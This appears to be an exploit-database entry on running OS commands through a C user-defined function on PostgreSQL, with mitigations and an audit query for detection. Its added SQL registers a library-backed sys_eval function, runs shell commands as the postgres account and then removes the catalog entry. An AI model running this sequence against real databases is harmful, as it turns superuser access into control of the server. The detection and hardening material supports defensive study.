Vendor: PostgreSQL
By: Bernardo Damele A. G.
CVSS: 7.5 (HIGH)
CWE: 78 (Command Execution)
Product Name: PostgreSQL
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Date: 2009
PostgreSQL UDF for command execution
This exploit lets an attacker who already holds a PostgreSQL superuser role run arbitrary operating-system commands on the database server. It is not a bug in PostgreSQL itself but abuse of a documented feature: only a superuser may register a user-defined function (UDF) written in C, and such a function runs with the full privileges of the backend process. The UDF is compiled into a shared library, which must first be placed on the server's filesystem (the delivery step is outside the scope of this entry) and is then registered with CREATE FUNCTION ... LANGUAGE C, which makes the backend dlopen() the file. The library has to be built against the same PostgreSQL major version as the server and carry the PG_MODULE_MAGIC block, otherwise the server refuses to load it. Once registered, the UDF is called like any other PostgreSQL function: it takes a single text argument, the command to run, executes it through a shell under the operating-system account the PostgreSQL backend runs as (typically postgres, not the SQL role name), and returns the command's output to the caller. In practice the superuser role is reached either through SQL injection in an application that connects as a superuser or by connecting directly with the credentials of such a role.
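The registration and call sequence described above, as an added example that is not part of the original entry or of the author's library. It assumes the shared object has already been written to the server at /tmp/udf_sys.so, was compiled against the running server's major version with PG_MODULE_MAGIC, and exports a V1-convention C function named sys_eval that runs its text argument with a shell and returns the captured standard output; the path and symbol name are hypothetical.

```sql
-- Added example; not the original advisory's code. Assumptions: /tmp/udf_sys.so
-- already exists on the database server, matches the server's major version,
-- and exports a V1 C function "sys_eval(text) -> text". Both names are hypothetical.

-- 1. CREATE FUNCTION ... LANGUAGE C is refused for any role that is not a
--    superuser, so check that before going further.
SELECT current_user, current_setting('is_superuser') AS is_superuser;

-- 2. Register the exported symbol as a SQL-callable function. The backend
--    dlopen()s the file here and rejects it if the magic block does not match.
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text
    AS '/tmp/udf_sys.so', 'sys_eval'
    LANGUAGE C RETURNS NULL ON NULL INPUT;

-- 3. Call it like any other function. The command runs as the OS account the
--    backend process runs under (normally "postgres"), not as the SQL role.
SELECT sys_eval('id; uname -a');

-- 4. Clean up the catalog entry. This does not unload the library from the
--    backend process and does not delete the file from disk; both remain as
--    artifacts for a responder to find.
DROP FUNCTION sys_eval(text);
```

The function row is visible in pg_proc for as long as it exists, with the file path in probin and the symbol name in prosrc, which is what the audit query under Mitigation keys on.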
Mitigation:
Because the technique requires a superuser role, the primary mitigation is least privilege: applications should connect as ordinary roles that hold only the grants they need, so that a SQL injection in the application cannot be escalated into CREATE FUNCTION ... LANGUAGE C. Restrict network access with a firewall so that only trusted hosts can reach the PostgreSQL port, and configure pg_hba.conf so the server accepts connections only from those hosts and only with password or certificate authentication rather than the trust method. Keep the server up to date with the latest security patches, and periodically review pg_proc for C-language functions whose object file does not belong to an installed extension, since a registered command-execution UDF leaves exactly that trace in the catalog.
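An audit query for the catalog review suggested above, added here and not part of the original entry. It lists every C-language function whose object file lives outside the packaged library directory ($libdir), which is how an attacker-registered UDF appears in pg_proc, and then the roles that could have created one. A legitimately installed library referenced by an absolute path will also show up, so the output is a triage list rather than proof of compromise.

```sql
-- Added audit query; not from the original advisory. Runs against the
-- system catalogs of any PostgreSQL database; no assumptions about names.
-- C functions record the shared-object path in pg_proc.probin and the
-- exported symbol in pg_proc.prosrc; built-in functions use the "internal"
-- language and have probin NULL, so they are excluded by the join.
SELECT n.nspname  AS schema,
       p.proname  AS function_name,
       p.probin   AS object_file,
       p.prosrc   AS exported_symbol,
       r.rolname  AS owner
FROM   pg_proc      p
JOIN   pg_language  l ON l.oid = p.prolang
JOIN   pg_namespace n ON n.oid = p.pronamespace
JOIN   pg_roles     r ON r.oid = p.proowner
WHERE  l.lanname = 'c'
  AND  p.probin IS NOT NULL
  AND  p.probin NOT LIKE '$libdir/%'
ORDER  BY n.nspname, p.proname;

-- Every role that can register such a function at all, and therefore run
-- OS commands as the backend user. Application roles should not be here.
SELECT rolname
FROM   pg_roles
WHERE  rolsuper
ORDER  BY rolname;
```

Run both as a superuser or a role with pg_read_all_stats-style catalog visibility, and compare the first result set against the extensions you deliberately installed.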